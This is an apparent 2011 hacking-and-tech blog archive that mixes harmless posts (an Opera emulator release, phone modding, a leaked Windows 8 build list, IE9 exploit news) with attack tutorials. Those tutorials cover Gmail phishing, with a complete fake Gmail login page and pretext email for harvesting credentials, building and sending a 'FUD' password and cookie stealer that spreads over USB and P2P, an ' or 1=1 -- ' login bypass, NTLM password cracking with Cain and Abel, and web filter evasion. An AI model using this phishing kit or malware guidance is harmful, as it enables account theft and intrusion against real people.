Showing posts with label Pc. Show all posts
Showing posts with label Pc. Show all posts

Saturday, May 28, 2011

Opera Software releases Mobile Emulator for developers

Opera Software has released the latest version of its Opera Mobile Emulator, an essential tool for anyone creating websites and web content. Mobile testing is the new black in modern day web development. However, testing on phones and tablets is rarely straightforward: you have to buy several devices or install complex software development kits.

With Opera’s new mobile emulator, this hassle is now history. We have made it easier than ever to install and run the Opera Mobile Emulator on your PC or Mac and tweak all kinds of environment settings, going from screen sizes and densities to input modes and much more.


Today’s release is a developer companion to our earlier Opera Mobile 11 release for Symbian and Android phones and tablets. As the Opera Mobile browser is already running on all these platforms, we went the extra mile and ported the product to also run on Windows, Mac and Linux.


“The Opera Mobile Emulator is a great tool for anyone who is involved with mobile development,” said Andreas Bovens, Group Leader for Developer Relations & Tools at Opera Software. “We wanted to make mobile testing super easy (yes, even our PR guys manage to use it!). In the emulator, you’ll find a ton of customization options for a wide range of mobile platforms. And, of course, you can do close-up code inspection and live editing via Opera Dragonfly’s remote debugging functionality.”
To download Opera Mobile Emulator open : www.opera.com/developer/tools/mobile/ 

Saturday, May 28, 2011 by Rishikesh · 0

Sunday, May 22, 2011

How To Hack Gmail Accounts Using Smart Gmail Phishing

Hi friends I hope you all are fine today I am going to post on article for "How To Hack Gmail Accounts" using Smart Gmail Phishing. Their are many Gmail Phisher available on net but I must say they all are outdated and most of them are detected, So I though to create a new Gmail Phisher which is very new and also created by me.
                                   
This article is for educational purpose only, We want to make you aware how hacking is done, So don't misuse this hacking tricks. We are not responsible for any wrong thing done by you. This How To Hack An Email Is Just A Demo.


Steps To Hack Gmail Account :-

1. Download Gmail Phisher ilAccountBySmartGmailPhiherBy GprsBay (New And Updated Gmail Phishing Page)
2. This is compressed in .rar so first extract the folder to desktop
3. Upload all three files to my3gb.com. Or Any Other Hosting sites
4. Now shorten (name.my3gb.com/index.html) in goo.gl every time for new victim . 
5. Now, you have to send this link to victim and make him login to our fake phishing page.
6. Once you came to know that victim logined to our Gmail Phishing Page then check log.txt
7. In log.txt you will his username and password as you can see in below screenshot

All steps are done, By this method you can Hack Any Gmail Account Easily. But still we are one step behind. Its easy to create and set up a Phisher, Its bit hard to trap victim in our phisher. You have create new ideas which chatting and mean while have to trap victim. This method is known as Smart Phishing or Smart Phisher. By this you can Hack Gmail Account For Free 
How To Defense From Phishing ?
Never enter your account information to the unknown webpage, always check the address bar and thus the webpage real address. 

So friends, I hope you enjoyed this New Gmail Phishing to Hack Accounts.

Sunday, May 22, 2011 by Rishikesh · 1

Wednesday, April 27, 2011

How to Download Facebook Videos Free

Go to Here and download the free web browser and if you don't already own it
Posted Image

Wait until Firefox is installed, then open and look at your tool bar,click on the one that says tools,click on the tab that says "Add-ons"
Posted Image

Open a new window,on the lower right hand side of the new window there is a link that says "Get Extensions",click it
Posted Image
Be at the Firefox websites add-on section,click on the search box and type in "grease monkey",download grease monkey and install
Posted Image

Install grease monkey follow this link Install and click install this script on the right hand side,install the script
Posted Image

Make sure grease monkey is turned on so go to tools,click add-ons and click enable on grease monkey ,if it isn't already
Posted Image
Click on the grease monkey options. A new window will open and on the lower left-hand side click the box that says enable.
Posted Image
Now whenever you're logged into Facebook, a download button is available
Posted Image

Or just simply copy paste the url of video of facebook and paste it Here 

Wednesday, April 27, 2011 by Rishikesh · 0

Bypass any blocked website without using a proxy!

Bypass any blocked website without using a proxy!

For some reason, some schools, colleges and even Governments. Choose to violate the right of access to information by blocking some websites. Thus, making you have to use slow proxies to bypass this not knowing that there is a better way around this and its not TOR/jap!

Go to command and type 'ping www.websiteyouwannaunblock.com'
get the IP address, and copy it into your browser. Hit enter and you should now be surfing the allegedly blocked site.

But if your internet activity is being monitored by smart people that method isn't supposed to work. Smart run webfilters check domain names and ip addresses associated with the blocked domains, so inserting the IP in place of the domain really becomes pointless.

What now?

In this case you will have to convert the IP you obtained from above into binary octets (What IPs really are), then back to decimal format and then you can put that into the browser. No webcontent filter will stand between you and your block site this time round.

So check it out:
Follow these steps, using the example IP address of 74.125.155.99:Run>calc>view>scientific

Verify that the calculator is in Decimal (dec should be selected).

Type in the first octet of the IP address (74) Convert the number to binary by clicking the bin radial button.

Write this number down. The calculator displays 1001010.
But Octets represent EIGHT digits.

The result from the calculator shows only seven digits. In order for this technique to work correctly enter each result in eight digits.

Pad the beginning of the number with zeroes until the octet has eight digits. This means you should write down 01001010

Switch the calculator back to Decimal. Clear the calculator display.

Repeat steps 1 through 6 for the remaining octets.

Your results should be:
74(01001010)
125(01111101)
155(10011011)
99 (01100011)

Switch the calculator to binary.
Combine the results of your conversion into a single 32-bit number (01001010011111011001101101100011).

Notice, if you failed to pad the last number with a zero, the result would be only 31 bits, and the technique would fail.

Type this number into the calculator and convert it to decimal. This should give you a decimal result of 1249745763.

Enjoy 

by Rishikesh · 0

Saturday, April 23, 2011

Hack website using HTML & JS

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how?? keep reading.....

Open the website you want to hack.

Provide wrong username- password in its log in form.(e.g : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username- password.

Now be prepared Your experiment starts from here...

Right click anywhere on that error page = go to view source.

There you can see the html codings with javascripts.

There you find somewhat like this....

<_form action="..login....">

Before this login information copy the url of the site in which you are.(e.g :

"<_ form..........action=http:// www.targetwebsite.com/ login.......>")

Then delete the javascript from the above that validates your information in the server.

(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)

Then take a close look for "<_ input name="password" type="password">"[without quotes] - replace "<_type=text> " there instead of "<_ type=password>". See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )

Just go to file = save as and save it any where in your hardisk with ext.html(e.g: c: \chan.html) Reopen your target web page by double clicking 'chan.html' file that you saved in yourharddisk earlier.

U see that some changes in current page as compared to original One.

Don't get worried. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.

Please read "_form"="form" & "_ type"="type" & "_input"="input" without quotes] The above trick won't work on the websites using latest technique to protect the re servers. Still you may find some websites to use this trick.

                                                                         Enjoy !!!!

Saturday, April 23, 2011 by Rishikesh · 0

Friday, April 22, 2011

How To Hack Facebook Account Using FUD Password Stealer

Hack Facebook Account Using Password Stealer / Cookies Stealer

I hope that you all know about Remote Password Stealer or you can say Cookies Stealer so, I am not taking this topic as it will make this article very boring. Though I am taking this topic for the newbies,

Cookies Stealer is a powerful hacking used to Steal Cookies Of Remote Computer And then we decrypt that cookies by using any online tool and thus we will get the Hacked Account Id And Password


Cookies Stealer / Password Stealer : How To Use ?
0. Download Cookies Stealer From Below And Extract It To Desktop
1. Get a free web hosting. Use : Host1free.com , t35.com , etc
2. Once you have everything set up, upload send.php.
3. Open I Can Haz Cookie Logger v1.0 - GprsBay
4. Enter the URL location of your uploaded send.php file.
5. Pick the options you wish under the tabs.
6. Go to the Build tab and press Build.
7. Send This Server created to victim and let him/her run your spy virus
8. You are done, you can go to that send.php and check for the victim's cookies
9. Once you got cookies then decrypt it for username and password .
10. Just search in Google how to decrypt cookies instantly

Your newly created server will be automaticly named output.exe , You can change the icon of that server by using the other tool provided during download.
Features Of Password Stealer :
Steals Password From Remote Computer To Hack Accounts
- Mozilla Firfox
- Filezilla

- No-Ip
- DynDns
- SmartFTP
- Windows Key
- Steam Name

Has Many other extra and required features like :
- 100% FUD
- Icon Changer
- USB Spreader
- P2P Spreader
- Error Message
- Autostart

So friends enjoy this new hacking tool which can be helpful to,

Friday, April 22, 2011 by Rishikesh · 0

Thursday, April 21, 2011

Sony Ericsson Xtreme Modding [Tutorial]


Hello frendz, Now i'm going to post a Tutorial, How to Customize (Like Changing Menu Icons, Fonts, Camera or Sound Driver) your Sony Ericsson A2 Phones (Sorry, Only A2 Phones. i'll post tutorial for other phones later, busy now. List of A2 Phones are Given below) OK, first Read Below before Starting
Is my phone A2?
These are all A2 phones as of 01-03-2010:
C Series: C510, C702, C901, C902, C903, C905
G Series: G502, G705
K Series: K630, K660, K850
T Series: T700, T707, T715
V Series: V640
W Series: W508, W595, W705, W715, W760, W890, W902, W910, W980, W995 Z Series: Z750, Z770, Z780
New SE phones: Jalou, Naite
My phone is not in this list!
Your phone is not compatible with A2 uploader, because it runs on a different platform. What do I need?
1. A2 uploader
With A2uploader you can now flash the phone with firmwares, customize your phone, de-brand your phone, add files to phone FS-FileSystem, upload flash menus and change menu icons and perform all customizations possible on the file system.
Important: Disable your Antivirus software before downloading. AV software recognises this as virus/trojan horse but this is a false alarm. This software is completely safe. bcz the_laser (cretor of a2 uploader) uses themidia encryption to prevent people stealing the sources and loaders of his A2uploader.

2. Some Menu Icons\Light effects\Camera-Display drivers, etc
You can download lots of Menu Icons and other stuff from Here (use Google Translate). To Staffs: I posted an external link. but its a russian site, to download firmware for sony ericsson handsets. i think its safe. if not then trash this thread

(Be sure to have the USB drivers installed, run ggsetup.exe that comes with the A2uploader archive (Download from Above Link))

Before we start your battery has to have enough power left, 80% or more. Customizing with a low battery percentage can kill your phone.
1. Start A2uploader and Click on File System Tool
2. Switch Off your Phone. Remove SIM Card and Memory Card. Re-insert battery.
Then Connect Phone by holding C Button (If the C is your On/Off button then try by holding 2+5 Buttons). Dont Release button until ur phone get detects by a2 uploader.

3. Wait for some Time for File System to intialize.
After it loads, you can navigate through the file system with your mouse.
4. Navigate to the location of your choice. (If you want to Change your Icons, Goto tpa\preset\system\menu)
To Upload Files, Just drag and drop files from your desktop or folder to A2uploader File System window.
5. Very imporant, after you finished uploading files to the phone FS you should click Shutdown FS Manager. Other wise all changes made will be lost.
After Click on &amp;amp;amp;amp;quot;Shutdown FS Manager&amp;amp;amp;amp;quot;. Disconnect Phone, Re-Insert your battery, Put the SIM and M2 back to Phone. then start your phone.

IMPORTANT NOTES
1. Before Replacing any files. Right Click on the File and Select READ. It will be backup your Original file to ph_out folder. And Dont Delete any files from There. Im not Responsible If u are did anything wrong
2. With The File System Tool you can customize your phone in many ways. Here are a few examples.
New Custom Acoustics for better sound quality.
New Custom Camera Drivers for better picture quality.
Flash Menus, Very cool animated flash themes with animated menus.
Menu Icons. With custom Menu ML you can completely control every menu in the sony ericsson phone.

Directories where the appropriate files are to be uploaded:-
- Menu Icons: /tpa/preset/system/menu/
- Sound Drivers: /ifs/settings/acoustic/
- Camera Drivers: /ifs/settings/camera/
- Start-Up/Shut-down Images/Sounds: /tpa/preset/system/settings/
- Sound System: /tpa/preset/system/sound/
- Fonts: /tpa/preset/system/fonts/

Thursday, April 21, 2011 by Rishikesh · 0

Saturday, April 16, 2011

WINDOWS 8 M1 [Leaked] [Dwnld]



WINDOWS 8 M1 [Leaked] [Dwnld]

Today goes to be a big leak day, Microsoft’s Windows 8 Build 7850 Milestone 1 got leaked on global village and mostly available on torrents for public download. The leaked build of Windows is 6.1.7850.0.winmain_win8m1.100922-1508_x86fre_client-enterprise_en-us.iso, which in short has the meaning that this build was compiled on 22nd September 2010.

According to the sources of Neowin, the leaked build of Windows 8 M1 is legitimate and this build of Windows 8 is currently available on a private FTP server site and just a few minutes away from the torrents to available it for public download.


Click here for download
 

The Windows 8 development

Roadmap: M1 / M2 / M3 / Beta1 / Beta2 / RC / RTM

GA: Jan 7th 2013


The latest Windows 8 Build

6.2.7982.0.winmain.110411-1832


The Windows 8 Build List



Code:
(NT6.1 76xx Winmain Branch Post-RTM)

6.1.7650.0.winmain.090917-1843 
6.1.7651.0.winmain.090924-1802 

6.1.7656.0.winmain.091015-0833 

6.1.7658.0.winmain.091019-1850  
6.1.7659.0.winmain.091020-1830  
6.1.7660.0.winmain.091021-1736  
6.1.7661.0.winmain.091022-1755 
6.1.7662.0.winmain.091023-1645  
6.1.7664.0.winmain.091027-1825  

6.1.7691.0.winmain.100106-1825 
6.1.7692.0.winmain.100107-1735 
6.1.7693.0.winmain.100111-1820 
6.1.7694.0.winmain.100113-1753 
6.1.7695.0.winmain.100114-1855 
6.1.7696.0.winmain.100115-1725 



(NT6.1 77xx Winmain Branch Post-RTM)

6.1.7700.0.winmain.100122-1900
6.1.7702.0.winmain.100126-1751
6.1.7703.0.winmain.100127-1845
6.1.7704.0.winmain.100128-1900
6.1.7705.0.winmain.100129-1930
6.1.7706.0.winmain.100201-1820
6.1.7707.0.winmain.100202-1715
6.1.7709.0.winmain.100204-1515
6.1.7710.0.winmain.100205-2005
6.1.7711.0.winmain.100208-1732
6.1.7712.0.winmain.100211-1740
6.1.7713.0.winmain.100212-1750
6.1.7714.0.winmain.100215-1450
6.1.7715.0.winmain.100217-1715
6.1.7716.0.winmain.100218-1836
6.1.7717.0.winmain.100219-1707
6.1.7718.0.winmain.100223-1403
6.1.7719.0.winmain.100224-1231
6.1.7720.0.winmain.100225-1845
6.1.7721.0.winmain.100226-1832
6.1.7722.0.winmain.100301-1456
6.1.7723.0.winmain.100302-1805
6.1.7724.0.winmain.100303-1435
6.1.7725.0.winmain.100304-1545
6.1.7726.0.winmain.100311-1807
6.1.7727.0.winmain.100315-1740
6.1.7727.0.winmain.100315-1747
6.1.7729.0.winmain.100318-1855
6.1.7730.0.winmain.100319-1635
6.1.7731.0.winmain.100323-1817

6.1.7764.0.winmain.100615-1748



(NT6.1 78xx Milestone 1)

6.1.7800.0.winmain_win8m1.100816-1855
6.1.7804.0.winmain_win8m1.100820-1742
6.1.7809.0.winmain_win8m1.100827-1740
6.1.7811.0.winmain_win8m1.100831-1731
6.1.7812.0.winmain_win8m1.100901-1810
6.1.7814.0.winmain_win8m1.100903-1700
6.1.7817.0.winmain_win8m1.100910-1622
6.1.7818.0.winmain_win8m1.100913-1840
6.1.7821.0.winmain_win8m1.100916-1940
6.1.7822.0.winmain_win8m1.100920-1625
6.1.7830.0.winmain_win8m1.100921-xxxx (Escrow Branch for Windows 8 Milestone 1)
6.1.7850.0.winmain_win81.100922-1508 [Leaked]



(NT6.2 7853 Milestone 2)

6.2.7853.0.winmain_win8m2.100928-1040
6.2.7855.0.winmain_win8m2.101001-1815
6.2.7857.0.winmain_win8m2.101006-1908
6.2.7859.0.winmain_win8m2.101008-1300
6.2.7866.0.winmain_win8m2.101019-1507
6.2.7867.0.winmain_win8m2.101020-1800
6.2.7867 (CES 2011 Build)
6.2.7870.0.winmain_win8m2.101025-1900
6.2.7871.0.winmain_win8m2.101026-1800
6.2.7874.0.winmain_win8m2.101029-1838
6.2.7875.0.winmain_win8m2.101101-1832
6.2.7878.0.winmain_win8m2.101104-1752 
6.2.7880.0.winmain_win8m2.101108-1530
6.2.7881.0.winmain_win8m2.101109-1816 
6.2.7882.0.winmain_win8m2.101110-1650 
6.2.7883.0.winmain_win8m2.101111-1631
6.2.7890.0.winmain_win8m2.101122-1810 
6.2.7891.0.winmain_win8m2.101123-1908 
6.2.7892.0.winmain_win8m2.101129-1902 
6.2.7895.0.winmain_win8m2.101202-1845 
6.2.7898.0.winmain_win8m2.101207-1620 
6.2.7899.0.winmain_win8m2.101208-1900 



(NT6.2 79xx Milestone 2)

6.2.7900.0.winmain_win8m2.101209-1830
6.2.7901.0.winmain_win8m2.101210-1755
6.2.7902.0.winmain_win8m2.101213-1745
6.2.7903.0.winmain_win8m2.101215-2325
6.2.7904.0.winmain_win8m2.101216-1845
6.2.7905.0.winmain_win8m2.110103-2100
6.2.7906.0.winmain_win8m2.110105-1750
6.2.7907.0.winmain_win8m2.110106-1823
‎6.2.7907.0.fbl_x.110109-1800 (FBL)
6.2.7908.0.winmain_win8m2.110107-1755
6.2.7909.0.winmain_win8m2.110110-1515
6.2.7910.0.winmain_win8m2.110111-1804
6.2.7911.0.winmain_win8m2.110112-1725

6.2.7913.0.winmain_win8m2.110114-1745
6.2.7914.0.winmain_win8m2.110118-1605
6.2.7915.0.winmain_win8m2.110119-1806
6.2.7916.0.winmain_win8m2.110121-1715
6.2.7917.0.winmain_win8m2.110125-1757
6.2.7918.0.winmain_win8m2.110126-1827
6.2.7919.0.winmain_win8m2.110127-1733
6.2.7920.0.winmain_win8m2.110128-1740
6.2.7920.0.fbl_srv.110128-1823 (Notepad.exe)
6.2.7921.0.winmain_win8m2.110201-2005
6.2.7922.0.winmain_win8m2.110202-1840
6.2.7925.0.winmain_win8m2.110207-1736
6.2.7926.0.winmain_win8m2.110209-1755
6.2.7927.0.winmain_win8m2.110210-1740
6.2.7928.0.winmain_win8m2.110214-1825
6.2.7929.0.winmain_win8m2.110215-1802
6.2.7930.0.winmain_win8m2.110217-1825
6.2.7947.0.winmain_win8m2.110218-1608 (Escrow Branch for Windows 8 Milestone 2)
6.2.7948.0.winmain_win8m2.110221-1703
6.2.7949.0.winmain_win8m2.110222-1545
6.2.7950.0.winmain_win8m2.110223-1820



(NT6.2 795x Milestone 3)

6.2.7955.0.winmain.110224-1502
6.2.7955.0.fbl_srv.110225-2127 (Shellstyle.dll)
6.2.7956.0.winmain.110228-1701
6.2.7959.0.winmain.11030x-xxxx
6.2.7959.0.fbl_srv.11030x-xxxx (7959 screenshots)
6.2.7961.0.winmain.110308-1712
6.2.7962.0.winmain.11031x-xxxx
6.2.7963.0.winmain.110310-1721
6.2.7964.0.winmain.11031x-xxxx
6.2.7968.0.winmain.110318-1830
6.2.7971.0.winmain.110324-1900
6.2.7972.0.winmain.110328-1838
6.2.7973.0.winmain.110329-1742
6.2.7974.0.winmain.110330-1622
6.2.7978.0.winmain.110405-1746
6.2.7979.0.winmain.110406-1800
6.2.7980.0.winmain.110407-1832
6.2.7982.0.winmain.110411-1832

Microsoft speak of Windows 8 "officialy" on Microsoft Careers France
Code:
"Looking for a responsible position within an innovative company?

 Join the Marketing Division of Microsoft Windows handles Windows 7 that France and is preparing to launch Windows 8, a transformation of the PC environment. And win a major change in course of proposing to Microsoft customers to consume these products "on premise"or "in the cloud.

 You will be in charge of Windows products for unmanaged clients - including the responsibility for achieving an income target of several tens of millions of dollars for France."


Copy/Paste prohibited! LINK THIS POST DIRECTLY THANKS

The Windows 8 Gallery


Install screenshots from the build 6.1.7850.0



Saturday, April 16, 2011 by Rishikesh · 0

Friday, April 15, 2011

Windows-XP Password Cracking

 
1>>Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.
First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.

Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process.

Two most effective techniques used here are "Brute-Force" and "Cryptanalysis".

Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols.
The step-by-step explaination for this technique is given below-

1) Open the tool "Cain and Abel" 



2) Go into the category "Cracker" it displays all sub-categories under "Cracker" in left panel.



3) Select "LM & NTLM Hashes" from left panel and then click on symbol, you will be greeted by a window as shown.



4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below.



5) Right clicking on any username shows all available options using which we can crack it's password.



6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes to store local users' passwords.

7) You will be greeted by a window where you can modify properties for brute-force attack such as password length, character set, etc.



8) Click on "Start" button.

9) On completion it will reveal the exact password.

Friday, April 15, 2011 by Rishikesh · 0

Thursday, April 14, 2011

Cracking GMail Account Password


1>>Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90% 

Step-1 : Create your own fake gmail login form using HTML

here is the html code for it
<html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type=text/css>
<!--
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin-top:2}

.c {width: 4; height: 4}

.bubble {background-color:#C3D9FF}

.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}

.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}

.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}

.feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; }
.feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; }

// -->
</style>

<title>
Gmail: Email from Google

</title>
</noscript>
</head>
<body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()">
<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
<tr valign=top>
<td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript> 
</td>
<td width=99% bgcolor=#ffffff valign=top>
<table width=100% cellpadding=1>
<tr valign=bottom>
<td><div align=right> </div></td>
</tr>
<tr>
<td nowrap=nowrap>
<table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>

<tr>
<td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
<script>utmx_section("title")</script>
<td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td>
<td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
</noscript>
</tr>
<tr>

<td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
<td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width=94% align=center cellpadding=5 cellspacing=1>
<tr>
<td valign=top style="text-align:left"><b>A Google approach to email.</b>
<td valign=top>
</tr>
<tr>
<td width=75% valign=top>

<p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>,
<br><br>
<table align="center" width="75%">
<tr><td><font size="-1">
We are moving database partly to our new server.<br>
This require your account verification for proper redirection...!<br>
Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br>
Repply this message within 72 hours.<br>
Thank You ! for your Co-Operation........!
</font><br><br>
<b>GMail Team</b>
</td></tr></table>
</font> 
</p>
</noscript>
</noscript> </td> <td valign=top> 
<div id=login> 
<form id="gaia_loginform" action="login.asp" method="post">
<div id="gaia_loginbox">
<table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0">

<tr>
<td valign="top" style="text-align:center" nowrap="nowrap"
bgcolor="#e8eefa"> 
<div class="loginBox">
<table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
<tr> 
<td colspan="2" align="center"> 
<table>
<tr> 
<td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td>
<td valign="middle"> <font size="+0"><b>Account</b></font> 
</td>
</tr>
</table></td>
</tr>
<script type="text/javascript"><!--
function onPreCreateAccount() {

return true;

}

function onPreLogin() {


if (window["onlogin"] != null) {
return onlogin();
} else {
return true;
}

}
--></script>
<tr> 
<td colspan="2" align="center"> </td>
</tr>
<tr> 
<td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl"> 
Username: </span> </div></td>
<td> <input type="text" name="Email" id="Email"
size="18" value=""

class='gaia le val'

/> </td>
</tr>
<tr> 
<td></td>
<td align="left"> </td>
</tr>
<tr> 
<td align="right"> <span class="gaia le lbl"> Password: 
</span> </td>
<td> <input type="password"
name="Passwd" id="Passwd"
size="18" 

class="gaia le val" 

/> </td>
</tr>
<tr> 
<td> </td>
<td align="left"> </td>
</tr>
<tr> 
<td> </td>
<td align="left"> <input type="submit" class="gaia le button" name="signIn"
value="Move"
/> </td>
</tr>
</table>
</div>
</td>
</tr>
</
table>
</div>
</form
>
</div> <br>
<table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links>
<tr bgcolor=#E8EEFA> 
<td valign=top align="center"><font size=+0><br>
<font size="-1"> <a href="http://mail.google.com/mail/help/intl/en/about.html">About 
Gmail</a
>     <a href="http://mail.google.com/mail/help/intl/en/about_whatsnew.html">New 
features!</a> </font> </font></td>
</table>
</noscript>

</table>
<br>
<table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
<td class=bubble rowspan=2 style=text-align:left>
<div align=center>
<font size=-1 color=#666666>©2008 Google -
<a href="http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer">Gmail for Organizations</a> -
<a href="http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr">Gmail Blog</a> -
<a href="http://mail.google.com/mail/help/intl/en/terms.html">Terms</a>

- <a href="http://mail.google.com/support/">Help</a>
</font>
</div>
</td>
<td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
</tr>
<tr>
<td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>

<td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
</tr>
</table>
</body>
</html>

now We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. 
OR

2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.

Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......

Thursday, April 14, 2011 by Rishikesh · 0

Wednesday, April 13, 2011

Download Full Version Sonic Pdf Creator with Serial License Key(Xclusive)

Sonic Pdf Creator is a professional and easy to use software for creating Pdf files.You can also watermark your pdf files and add password protection to your pdf files using Sonic Pdf creator.It also gives you the option for merging or splitting the pdf documents.It is compatible with Windows 98, ME, Windows NT 4.0, 2000, XP, Vista and Windows 7. 
Here are some of the features of Sonic Pdf creator 
* Reliable PDF Creation * Document security * Advanced PDF Editing Features The actual cost od this software is
$74.95 but by using the promotional offer you can download the full version of sonic pdf creator with serial license key for free. Here is the step by step tutorial on how you can the pdf creator for free.
Open facebook in new tab and login into your facebook account
4. Click on the Like Button on the promotional page. 5. Enter you valid name and email address on the page and after you click submit you will recieve your 12 digit key. pdf creator1 300x286 Download Full Version Sonic Pdf Creator with Serial License Key 6. Now install the software and enjoy the full version for free.

Wednesday, April 13, 2011 by Rishikesh · 0

Tuesday, April 12, 2011

Security Task Manager 1.8 Full

Security Task Manager 1.8 is very handy utility to enhanced the functionality of "Windows Task Manager" by warning you about potential system threats. When you launch Security Task Manager, it automatically scans your PC to find all running programs. It then displays information about each application in a sortable list, including name, CPU usage, size, manufacturer, and risk factor. Security Task Manager 1.8 highlighting each entry and gives you more detailed data on running processes, including a description of what it does and how much of a threat it poses to your system. If Security Task Manager finds a potentially malevolent program, you can remove or quarantine it. Security Task Manager 1.8 has support to scan any process with online antivirus service VirusTotal. Security Task Manager 1.8 also has a nice feature that automatically searches Google for information about a specific program with a single click. Security Task Manager 1.8 offer a nice range of features, this program will be useful to those looking for an extra layer of system protection.


Tuesday, April 12, 2011 by Rishikesh · 1

IE9 exploit puts Windows 7 SP1 at Risk

A new exploit for IE9 bypasses all security measures in even the latest fully patched version of Windows 7, according to a French security company Vupen. The exploit uses an unpatched zero-day vulnerability in Internet Explorer 9 and bypasses all the extra security measures of Windows 7. The latest version of Microsoft's operating system, fully up-to-date with service pack 1 (SP1), is vulnerable. The security hole was reported by the French security company Vupen, that previously discovered an IE8 vulnerability in December of last year.(MS11) 

Vupen classifies the exploit for IE9 as reliable, which means it's an effective way for cyber attackers to run malicious code of their choosing on Windows 7 PCs. The exploit manages to break through Windows' additional security layers, such as ASLR, DEP and the sandbox (Protected Mode) in IE9.

"The exploit uses two distinct vulnerabilities. The first one allows execution of arbitrary code within the IE9 sandbox. The second one allows the bypass of the sandbox to achieve full code execution," Vupen's CEO Chaouki Bekra told Dutch IDG news site Webwereld.

The risk of this exploit so far is limited: exploit code has not been spotted in the wild. The vulnerabilities were discovered by researchers from Vupen, who made their own exploit. "We confirmed the exploitability of the vulnerability and we created a code execution exploit which works with Internet Explorer 9 on Windows 7 and Windows 7 SP1," Bekra said.

Bekra stressed that the vulnerabilities have not been publicly disclosed. "Access to our code and to the in-depth analysis of the vulnerability is restricted to our government customers who use the information to protect their critical infrastructures," he said.

IE9 is not much in use by governments or even companies. However, the vulnerability is not limited to the latest version of Microsoft's browser. The security hole is also present in IE8, 7 and 6, for which Vupen has not made a working exploit.

"The flaw affects Internet Explorer 9, 8, 7, and 6, and results from a use-after-free error within the 'mshtml.dll' library when processing a specific combination of HTML and JavaScript code." Vupen advises all IE users to disable JavaScript or use another Web browser which is not affected by the vulnerability.

